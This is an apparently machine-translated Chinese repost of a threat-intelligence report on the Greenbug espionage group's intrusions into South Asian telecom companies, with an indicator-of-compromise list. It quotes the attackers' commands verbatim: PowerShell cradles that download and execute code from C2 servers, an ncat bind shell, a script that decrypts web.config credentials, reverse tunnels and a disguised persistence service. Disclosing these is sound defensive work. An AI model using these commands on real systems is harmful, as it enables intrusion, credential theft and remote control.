Greenbug间谍组织正积极瞄准南亚的电信公司

Greenbug间谍组织正积极瞄准南亚的电信公司,活动最早发生在2020年4月。 有迹象表明,至少有一家公司最早于2019年4月成为攻击目标。 电子邮件似乎是该小组使用的初始感染媒介。Greenbug在这些攻击中混合使用了现成的工具和陆地上的技术。该小组似乎有兴趣获得对数据库服务器的访问权限;我们看到它窃取凭据,然后使用被窃取的凭据测试与这些服务器的连接。 据信,Greenbug可能来自伊朗。过去,有人猜测它与破坏性的Shamoon组织有联系,该组织对沙特阿拉伯的组织进行了擦磁盘攻击。Shamoon攻击已被广泛涵盖,但尚不清楚攻击者如何窃取凭据,使他们可以将破坏性恶意软件引入受害者系统。赛门铁克于2017年进行的研究发现了证据,表明Greenbug在涉及W32.Disttrack.B(Shamoon的恶意软件)的抹杀攻击之前已在组织的网络中。从未明确建立这种联系,但认为这两个集团之间的合作是可能的。 我们在这次攻击活动中看到的许多活动与过去在Greenbug中看到的活动是一致的,包括使用电子邮件作为初始感染媒介,使用公开可用的黑客工具(如Mimikatz和Plink)以及专注于收集凭据并在受害网络上保持持久的低调状态。

感染载体

在多个受害机器上,通过互联网浏览器执行了一个名为proposal_pakistan110.chm:error.html的文件。我们还看到存档程序工具正在打开同一文件。尽管我们无法检索文件进行分析,但Greenbug早在2016年就利用了相同的技术。在这些较早的攻击中,电子邮件被发送到目标,其中包含指向可能被感染的站点的链接,该站点托管了一个存档文件。该档案文件包含一个恶意的CHM文件(编译的HTML帮助文件),其中包括一个ADS(替代数据流)以隐藏其有效负载,该负载在执行时已安装。该文件通常还包含诱饵PDF文件,该文件包含一条错误消息,提示无法正确打开该文件。 我们还看到过去在其他组织中使用了类似名称的文件来删除Trojan.Ismdoor,这是Greenbug的自定义恶意软件。 在看到该文件的大约同一时间,还执行了一个名为GRUNTStager.hta的文件。赛门铁克认为,攻击者使用了可公开获得的《盟约利用后框架》,以在其目标组织中初步立足。 Covenant是一个公开可用的黑客工具,被描述为“ .NET命令和控制框架,旨在突出.NET的攻击面,使进攻性.NET贸易工具的使用更加轻松,并充当协作式命令和控制平台。 ” 它被描述为供“红色团队”使用,但也容易被恶意行为者滥用。

案例研究:六个月的入侵

从2019年10月到2020年4月,Greenbug出现在一个组织的系统中。它似乎有兴趣访问该组织的数据库服务器。观察到攻击者在受害者系统上执行了各种PowerShell命令。 第一个活动发生在2019年10月11日,当时执行了恶意的PowerShell命令以安装CobaltStrike Beacon模块以下载下一阶段的有效负载。 我们能够从PowerShell命令中提取两个命令和控制(C&C)服务器地址。 最初,攻击者利用此访问权限执行PowerShell,以确定通过$ PSVersionTable安装的PowerShell版本。此后,我们发现攻击者继续尝试下载托管在先前提到的同一C&C服务器上的恶意文件。
PowerShell.exe -nop -w hidden -c $L=new-object net.webclient;$L.proxy=[Net.WebRequest]::GetSystemWebProxy();$L.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $L.downloadstring('http://95[.]179.177.157:445/0Zu5WpWN');
该命令已执行了几次,但不清楚攻击者是否成功。大约一个小时后,还发现攻击者试图通过bitsadmin实用程序下载到CSIDL_APPDATA \ a8f4.exe。
bitsadmin / transfer a8f4 http://95.179.177.157:8081/asdfd CSIDL_APPDATA \ a8f4.exe
BITS管理实用程序可用于下载或上传要执行的作业。这是一个合法工具,我们通常会看到恶意行为者对其滥用。攻击者使用此工具将其他恶意工具下载到了受感染的计算机上。 不久之后,攻击者从CSIDL_SYSTEM86 \ [REDACTED]目录执行了一些工具:
Hash Directory Tool
2a3f36c849d9fbfe510c00ac4aca1750452cd8f6d8b1bc234d22bc0c40ea1613 csidl_system_drive\[REDACTED] revshell.exe
9809aeb6fd388db9ba60843d5a8489fea268ba30e3935cb142ed914d49c79ac5 csidl_system_drive\[REDACTED] printers.exe
3c6bc3294a0b4b6e95f747ec847660ce22c5c4eee2681d02cc63f2a88d2d0b86 csidl_system_drive\[REDACTED] msf.exe
然后看到攻击者正在启动PowerShell,并尝试执行名为msf.ps1的PowerShell脚本。
PowerShell.exe -ExecutionPolicy Bypass -File CSIDL_SYSTEM_DRIVE\[REDACTED]\msf.ps1
该命令已执行了几次,可能用于安装Metasploit有效负载以保留对受感染机器的访问。那是当天的最后一次活动。 直到2020年2月6日,当执行可疑的PowerShell命令时,才观察到进一步的活动。PowerShell命令遵循w3wp.exe进程的执行– w3wp.exe进程是用于向Web应用程序提供请求的应用程序。这可能表明攻击者已在受感染计算机上使用了Webshel​​l。 以下是攻击者执行的PowerShell命令的副本:
$ErrorActionPreference = 'SilentlyContinue';$path="C:\[REDACTED]\";Foreach ($file in (get-childitem $path -Filter web.config -Recurse)) {; Try { $xml = [xml](get-content $file.FullName) } Catch { continue };Try { $connstrings = $xml.get_DocumentElement() } Catch { continue };if ($connstrings.ConnectionStrings.encrypteddata.cipherdata.ciphervalue -ne $null){;$tempdir = (Get-Date).Ticks;new-item $env:temp$tempdir -ItemType directory | out-null; copy-item $file.FullName $env:temp$tempdir;$aspnet_regiis = (get-childitem $env:windir\microsoft.net\ -Filter aspnet_regiis.exe -recurse | select-object -last 1).FullName + ' -pdf ""connectionStrings"" ' + $env:temp + '\' + $tempdir;Invoke-Expression $aspnet_regiis; Try { $xml = [xml](get-content $env:temp$tempdir$file) } Catch { continue };Try { $connstrings = $xml.get_DocumentElement() } Catch { continue };remove-item $env:temp$tempdir -recurse};Foreach ($_ in $connstrings.ConnectionStrings.add) { if ($_.connectionString -ne $NULL) { write-host ""$file.Fullname --- $_.connectionString""} } };
此命令用于搜索类似于web.config的文件。对于找到的每个文件,它将在可能的情况下提取用户名和密码信息,并使用aspnet_regiis.exe实用工具对其进行解密。这些凭据可用于访问组织资源,例如SQL Server。 2月12日和2月14日看到了进一步的活动。2月12日,攻击者返回并执行了一个工具:pls.exe。一个小时后,攻击者使用netcat通过以下命令将cmd.exe绑定到侦听端口:
CSIDL_SYSTEM_DRIVE\[REDACTED]\infopagesbackup\ncat.exe [REDACTED] 8989 -e cmd.exe
大约20分钟后再次发出相同的命令。 两天后,当地时间上午7.29,攻击者返回并连接到侦听端口,启动cmd.exe。 他们发出了以下命令:
Command Description
CSIDL_SYSTEM\cmd.exe" /c net user" List all available local user accounts and information
PowerShell -c Get-PSDrive -PSProvider \" FileSystem\""""""" List all available drives on the filesystem and related information (e.g. available space, location etc.)
第二天(2月15日),攻击者返回命令提示符,并发布了添加用户的命令,然后检查是否添加了该用户。直到3月4日,才在本地时间6.30pm启动PowerShell命令时才观察到进一步的活动。还观察到一个WMI命令正在执行,并用于搜索特定帐户。此后不久,从%USERPROFILE%\ documents \ x64执行了著名的凭据窃取工具Mimikatz。  3月11日,攻击者可能尝试使用PowerShell来连接到数据库服务器,大概是使用他们窃取的凭据。攻击者还使用SQL命令检索数据库服务器的版本信息,大概是为了测试凭据和连接性。
PowerShell -C
$conn=new-object System.Data.SqlClient.SQLConnection(" ""Data
Source=[REDACTED];User [REDACTED] { $conn.Open(); }Catch { continue;
}$cmd = new-object System.Data.SqlClient.SqlCommand(" ""select
@@version;" "", $conn);$ds=New-Object
system.Data.DataSet;$da=New-Object
system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill($ds);$ds.Tables[0];$conn.Close();""
四月份看到进一步的活动。4月8日,观察到可疑的PowerShell命令试图从远程主机下载工具。
PowerShell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://185.205.210.46:1003/iO0RBYy3O');
PowerShell.exe -nop -w hidden -c $m=new-object net.webclient;$m.proxy=[Net.WebRequest]::GetSystemWebProxy();$m.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $m.downloadstring('http://185.205.210.46:1131/t8daWgy9j13');
那是4月8日看到的唯一活动,然后4月13日启动了PowerShell,并观察到以下命令正在执行:
Command Description
PowerShell.exe" -noninteractive -executionpolicy bypass whoami" Check the account name of the current user executing the command
PowerShell.exe" -noninteractive -executionpolicy bypass netstat -a" Network routing information
接下来,使用PowerShell将数据库连接到数据库服务器并检查版本信息,从而可能确认工作凭据。这与先前观察到的PowerShell命令类似,只是数据库服务器IP地址不同。 最后,攻击者使用PowerShell通过arp -a命令查看当前ARP表(最近与之通信的计算机的IP和主机名)。那是我们在这台机器上观察到的最后一个活动。 在此计算机上发现了许多可疑文件(请参阅IoC)。这些文件包括如前所述的Covenant工具和Mimikatz,以及可用于将shellcode加载到受害机器上的现成工具Cobalt Strike,以及多个webshel​​l。

同一网络上的其他计算机

我们在同一受害者网络上的各种机器上看到可疑活动。攻击者使用相同的文件proposal_pakistan110.chm:error.html将组织中的其他几个用户作为目标,该文件是由存档工具打开的,在某些情况下是通过Microsoft Edge浏览器打开的。之后,我们观察到在计算机上正在执行后门程序,以及从攻击者的基础结构下载到%APPDATA%目录的其他工具。
Hash Directory Tool
450ebd66ba67bb46bf18d122823ff07ef4a7b11afe63b6f269aec9236a1790cd CSIDL_COMMON_APPDATA\oracle local.exe
ee32bde60d1175709fde6869daf9c63cd3227155e37f06d45a27a2f45818a3dc CSIDL_COMMON_APPDATA\adobe adobe.exe
071e20a982ea6b8f9d482685010be7aaf036401ea45e2977aca867cedcdb0217 c:\programdata\oracle java.ee

隧道回到攻击者

在该组织的一台计算机上,我们在12月9日看到了一些可疑的PowerShell命令。PowerShell执行的文件之一comms.exe是Plink。第二个类似的命令使用了Bitvise命令行隧道客户端。两种工具都用于建立通向攻击者控制的基础结构的隧道,以允许终端服务和RDP访问内部计算机。
"CSIDL_COMMON_APPDATA\comms\comms.exe" apps.vvvnews.com -P <?,?> -l <?,?> -pw <?,?> -proxytype http_basic –proxyip [REDACTED] -proxyport 8080 -proxyuser [REDACTED].haq -proxypass [REDACTED] -C -R [REDACTED]:4015:[REDACTED]:1540
"CSIDL_COMMON_APPDATA\comms\comms.exe" [REDACTED] -pw=[REDACTED] -s2c=[REDACTED] 1819 [REDACTED] 3389 -proxy=y -proxyType=HTTP -proxyServer=[REDACTED] -proxyPort=8080 -proxyUsername=[REDACTED]\[REDACTED].haq -proxyPassword=<?,?>
诸如Plink和Bitvise之类的工具是合法的sysadmin工具,但之前曾被恶意行为者利用,包括今年早些时候被伊朗行为者利用。 在该组织的第二台计算机上还看到了Plink,该计算机似乎已从2019年11月到2020年4月受到威胁。该计算机上的第一个可疑活动是在11月13日看到的,当时在该计算机上启用了PowerShell Remoting以允许它接收PowerShell命令。 使用PowerShell命令从攻击者控制的基础结构中下载文件,并使用特定参数启动该文件。
(New-Object System.Net.WebClient).DownloadFile('http://apps[.]vvvnews.com:8080/Yft.dat', 'C:\Programdata\VMware\Vmware.exe');
start-process C:\Programdata\VMware\Vmware.exe -arg 'L3NlcnZlcj12c2llZ3J1LmNvbSAvaWQ9NDE=';
该参数解码为/server=vsiegru.com / id = 41。此后不久,便执行了Plink实用程序以建立与受害者网络的连接。然后执行第二个PowerShell命令,如下所示:
Del -force C:\Programdata\Vmware\Vmware.exe;
(New-Object System.Net.WebClient).DownloadFile('http://apps[.]vvvnews.com:8080/Yf.dat', 'C:\Programdata\Nt.dat');
move C:\Programdata\Nt.dat C:\Programdata\Vmware\VMware.exe -force;
cmd.exe /c sc create "VMwareUpdate" binpath= "C:\Programdata\Vmware\VMware.exe L3NlcnZlcj1rb3BpbGthb3J1a292LmNvbSAvaWQ9NDkgL3Byb3h5PXllcyAvcHJveHl1cmw…[REDACTED]…BUTUxcamF2ZWQubmFiaSAvcGFzc3dvcmQ9cHRtbEAyMjMz" displayname= "VMware Update Service" start= auto;
start-service VMwareUpdate;
Exit;
编码的参数解码为以下内容:
/server=kopilkaorukov.com /id=49 /proxy=yes /proxyurl=http://[REDACTED]:8080 /credential=yes /username=[REDACTED]\[REDACTED] /password=[REDACTED]
然后看到攻击者在该计算机的管理员组中添加了一个用户。大约一周后的11月16日,又在该计算机上执行了另外两个PowerShell命令。 第一个解码为以下内容:
iex ((New-Object Net.WebClient).DownloadString('http://apps[.]vvvnews.com:8080/Default.htt'))
由于攻击者已使用Plink工具建立了隧道,所有连接似乎都在路由到内部计算机IP地址。这样做可能是为了逃避检测。

针对电信的活动

Greenbug在此活动中的活动似乎表明,这些受害者的主要重点是窃取凭据,并在受害者的网络上保持低调,以便攻击者可以在其上保持相当长的一段时间。这是我们过去在Greenbug受害者中看到的典型活动,保持受害者网络的持久性似乎是该组织的主要目标之一。在以前的攻击活动中,还观察到Greenbug是针对同一地区的电信公司的。 隧道的建立表明了保持低调对于这个群体而言是多么重要。它的重点是窃取凭据,并建立与数据库服务器的连接,这表明它旨在实现对受害者网络的高级别访问-这种访问如果被利用,可能会很快对受感染的网络造成破坏。如果参与者使用破坏性恶意软件或勒索软件加以利用,则这种访问级别可能会很快关闭组织的整个网络。  Greenbug的先前受害者包括航空,政府,投资和教育部门以及电信部门的组织,2017年袭击了中东的电信组织。在2019年,我们观察到18个民族国家支持的针对全球电信行业,因此最近它似乎是老练演员感兴趣的领域。 也许很难理解为什么由电话提供商和互联网服务提供商(ISP)组成的电信行业对APT团体具有吸引力,而APT团体的主要动机通常是收集情报。电信公司对电话,通信日志和消息的访问使它们成为这些攻击者的宝贵目标。 我们只能推测Greenbug瞄准这些特定电信公司的动机,但是很明显,对受害网络的全面持久的访问仍然是该小组的主要优先事项。 

保护

赛门铁克产品通过以下检测来防范此博客中讨论的威胁:
  • 特洛伊木马
  • Trojan.Ismdoor!gen1
  • 系统感染:Trojan.Ismdoor活动

危害指标(IoC)

Type Value Description
Domain apps.vvvnews.com C2
Domain vsiegru.com C2
Domain kopilkaorukov.com C2
Filename GruntStager.hta Covenant stager
Hash 2a3f36c849d9fbfe510c00ac4aca1750452cd8f6d8b1bc234d22bc0c40ea1613 Reverse Shell
Hash 9809aeb6fd388db9ba60843d5a8489fea268ba30e3935cb142ed914d49c79ac5 Infostealer
Hash 3c6bc3294a0b4b6e95f747ec847660ce22c5c4eee2681d02cc63f2a88d2d0b86 Backdoor
Hash ece23612029589623e0ae27da942440a9b0a9cd4f9681ec866613e64a247969d Mimikatz
Hash b8797931ad99b983239980359ef0ae132615ebedbf6fcb0c0e9979404b4a02a8 Webshell
Hash 9de28b94aa3f1a849221cf74224554b41a77473c694cadf3f2526ab06480eb85 Webshell
Hash b51eca570abad9341a08ae4d153d2c64827db876ee0491eb941d7e9a48d43554 Webshell
Hash 16e1e886576d0c70af0f96e3ccedfd2e72b8b7640f817c08a82b95ff5d4b1218 Webshell
Hash abb3ddc945d147a4ed435b71490764bc4a2860f4ad264052f407357911bd6746 Webshell
Hash 6cb51c7011f27418c772124d4433350a534061f5732c1331f5483d62b42402f7 Webshell
Hash 9bf8121e0f3461412dde107c4d1ceb2ed18ec0741f458956830e038fd1be6d44 Webshell
Hash 75cee6136011516dfe7bd9e45b25c2cf5d9af149a81fff0b8b3ab157a8cbf321 Covenant stager
Hash e974237c32f5d28019c5328bd022469236da87eecee19487902133aea89432a0 Covenant stager
Hash f577fc8f22b6eec782dbcbe54f5a8f3b00e8e6d8dc7aa94b2fffcc2b7ce09c6a Covenant stager
Hash 53bbc9ebe40725bd74ebf29616f48a8aed0a544dd0e4f40801ac1b522f2cf32f CHM file
Hash fd95ffb7c70f828ef021e7dbdaf852f54f385095e7f58607f093096b68f40a32 Backdoor
Hash 071e20a982ea6b8f9d482685010be7aaf036401ea45e2977aca867cedcdb0217 Unknown
Hash ee32bde60d1175709fde6869daf9c63cd3227155e37f06d45a27a2f45818a3dc Backdoor
Hash 4c7813a1f3eb5d5d8b8a1e53af074c96cfc6ddb14b21188fd84970f001bfc0ff Unknown
Hash 471dadfe16cf2cf82566d404d2b7d1baf66b72c385ae272dcc743a285113e280 CHM file
Hash 069a29a0642ea5e2034250f5465cb2230edf1b49ad42d16ff4cddfee1f693314 Unknown
Hash faba07425c1fa65a9a68a17b99e83663a2a32fbb2a7c3df347b7a7411a7058bc Unknown
Hash 0644b3ffc856eb54b53338ab8ecd22dd005ee5aacfe321f4e61b763a93f82aea Unknown
Hash fc002268620fa67ffe260ea9f3a6bbad8637f9bef8ae85b8d6061cec0390b9e2 Unknown
Hash 450ebd66ba67bb46bf18d122823ff07ef4a7b11afe63b6f269aec9236a1790cd Unknown
IP Address 95.179.177.157 Covenant C2
IP Address 185.205.210.46 Powershell C2
IP Address 185.243.115.69 Proxy tunnel
IP Address 185.243.114.247 Proxy tunnel
0 0 vote
Article Rating

未经允许不得转载:x-sec » Greenbug间谍组织正积极瞄准南亚的电信公司

赞 (0) 打赏
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
Inline Feedbacks
View all comments

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

0
Would love your thoughts, please comment.x
()
x